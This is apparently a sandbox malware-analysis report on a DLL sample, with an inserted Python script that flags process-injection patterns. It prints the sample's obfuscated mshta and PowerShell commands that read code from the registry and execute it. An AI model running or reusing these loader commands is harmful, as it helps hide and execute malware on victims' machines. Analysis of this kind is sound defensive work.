                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF78E8112E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 358000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2480000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 35A000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 2470000
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy
                      Source: C:\Windows\System32\control.exe Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FF802BC1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2470000 protect: page execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 358000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2480000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35A000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 2470000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1308
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616
                      Source: C:\Windows\System32\control.exeThread register set: target process: 6160
                      Source: C:\Windows\explorer.exeThread register set: target process: 4440
                      Source: C:\Windows\explorer.exeThread register set: target process: 4724
                      Source: C:\Windows\explorer.exeThread register set: target process: 4960
                      Source: C:\Windows\explorer.exeThread register set: target process: 3340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 2BC1580
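The rows above show powershell.exe and control.exe each writing a 0xEB byte to the same address in explorer.exe (PID 3616), overwriting it with 0x40 afterwards, flipping the page protection between writable and execute-read, allocating an execute-read-write region, and starting a thread whose EIP matches the patched address. The Python script below is an added example, not part of the Joe Sandbox report or of the sample: it parses rows copied from this report (embedded inline as constructed input), correlates writes, protection changes, allocations and thread creations per source process, and reports the combinations that together indicate a remote inline hook. Two interpretations are assumptions stated in the comments: 0xEB is read as the x86 short JMP opcode, and the EIP printed by the report is treated as the low 32 bits of the patched 64-bit address.

```python
import re
from collections import defaultdict

# Memory-manipulation rows copied from the report above (constructed input for this example):
# powershell.exe and control.exe acting on explorer.exe, PID 3616. Both the raw
# "control.exeMemory written:" form and the "... | Memory written:" form are accepted.
MEMORY_ROWS = r"""
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF802BC1580
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and write copy
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute read
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 2470000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 358000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 2480000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: 40
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 35A000 value: 00
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: EB
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 2470000 value: 80
Source: C:\Windows\System32\control.exe | Memory written: PID: 3616 base: 7FF802BC1580 value: 40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 2BC1580
"""

ROW = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Memory written|Memory protected|Memory allocated|Thread created):\s*"
    r"(?P<target>PID: \d+|unknown|.+?\.exe)\s*"
    r"(?:base: (?P<base>[0-9A-F]+)|EIP: (?P<eip>[0-9A-F]+))"
    r"(?: value: (?P<value>[0-9A-F]{2}))?(?: protect: (?P<protect>.+))?$",
    re.I,
)
SHORT_JMP = 0xEB  # x86 short JMP opcode: assumed meaning of the first byte the report shows


def analyse(rows):
    """Return (finding, source image name, address) tuples for remote inline-hook patterns."""
    writes = defaultdict(list)    # (source, address) -> first bytes written, in report order
    protects = defaultdict(list)  # (source, address) -> protections applied, in report order
    threads = []                  # (source, EIP of the remote thread)
    findings = []
    for line in rows.strip().splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        src = m["src"].rsplit("\\", 1)[-1].lower()
        kind = m["kind"].lower()
        protect = (m["protect"] or "").lower()
        if kind == "memory written" and m["value"]:
            # The "PID: ... value: EB" rows repeat the path-based rows and add the first byte; keep those.
            writes[(src, int(m["base"], 16))].append(int(m["value"], 16))
        elif kind == "memory protected":
            protects[(src, int(m["base"], 16))].append(protect)
        elif kind == "memory allocated" and "execute" in protect and "write" in protect:
            findings.append(("rwx_remote_alloc", src, int(m["base"], 16)))
        elif kind == "thread created":
            threads.append((src, int(m["eip"], 16)))
    for (src, addr), first_bytes in writes.items():
        # A short JMP stored at a code address and later overwritten with a different byte is an
        # inline hook being placed on a function prologue and then put back.
        if SHORT_JMP in first_bytes and any(b != SHORT_JMP for b in first_bytes):
            findings.append(("prologue_patch", src, addr))
    for (src, addr), prots in protects.items():
        if any("write" in p for p in prots) and prots[-1] == "page execute read":
            findings.append(("protection_restored_after_write", src, addr))
    for src, eip in threads:
        # Assumption: the report prints EIP truncated to 32 bits, so compare with the low 32 bits.
        for (s, addr) in writes:
            if s == src and (addr & 0xFFFFFFFF) == eip:
                findings.append(("thread_at_patched_address", src, addr))
    return findings


if __name__ == "__main__":
    for finding in analyse(MEMORY_ROWS):
        print(f"{finding[0]:32} {finding[1]:16} {finding[2]:X}")
```

Run stand-alone it prints six findings: a prologue patch and a thread start at 7FF802BC1580 for each of the two injecting processes, the RWX allocation at 2470000 and the protection round-trip, all attributed to control.exe or powershell.exe rather than to explorer.exe, which is the victim here.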
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qiip='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qiip).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\628df1368bdb5.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name sdiwcaphnc -value gp; new-alias -name ixgamvji -value iex; ixgamvji ([System.Text.Encoding]::ASCII.GetString((sdiwcaphnc "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebwfha3\vebwfha3.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hpvnexdj\hpvnexdj.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES10A0.tmp" "c:\Users\user\AppData\Local\Temp\vebwfha3\CSC57533E6B898B4B7BB8DAE45DDD64B0AA.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES20CD.tmp" "c:\Users\user\AppData\Local\Temp\hpvnexdj\CSC5D09D8212D1C47D8BF5AC4D6502884C9.TMP"
Source: C:\Windows\System32\control.exe | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: explorer.exe, 00000023.00000000.451165149.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.415855270.0000000005E60000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000023.00000000.429667493.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.407089637.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.431581264.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.407631354.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager,
Source: explorer.exe, 00000023.00000000.430587488.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.431581264.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000023.00000000.407631354.0000000000B50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01353365 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01354B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01356D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_01353365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

Source: Yara match | File source: 00000002.00000003.284358027.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.406000540.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284640245.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330015857.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284923269.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.407125294.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.282160828.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000003.396856959.0000021CC440C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.282249243.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.406118031.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.281975107.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000003.466739485.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.331626577.00000000055FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284844503.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.284896687.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.470946138.000002B63B79C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330946552.00000000057F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.385259883.00000000065A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: 2.3.rundll32.exe.51294a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.1350000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.56fa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.56fa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.51294a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.57a6b48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.57794a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000021.00000000.403852849.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.404491813.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.451962892.0000000005129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.514581941.0000021CBC11E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330837608.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.330869970.0000000005779000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.452499963.00000000011A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000000.405551688.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.454256522.000000000547F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (columns): Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts1
                      Windows Management Instrumentation
                      Path Interception812
                      Process Injection
                      1
                      Obfuscated Files or Information
                      3
                      Credential API Hooking
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      Exfiltration Over Bluetooth2
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)Logon Script (Windows)4
                      Rootkit
                      Security Account Manager1
                      File and Directory Discovery
                      SMB/Windows Admin Shares3
                      Credential API Hooking
                      Automated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Masquerading
                      NTDS25
                      System Information Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                      Virtualization/Sandbox Evasion
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common812
                      Process Injection
                      Cached Domain Credentials11
                      Security Software Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                      Process Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Behavior Graph ID: 633910 | Sample: 628df1368bdb5.dll | Startdate: 25/05/2022 | Architecture: WINDOWS | Score: 100
Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures
Process tree (numbers after a process name are the report's per-node counts, shown unchanged):
mshta.exe 19 (started)
  powershell.exe 33 (started)
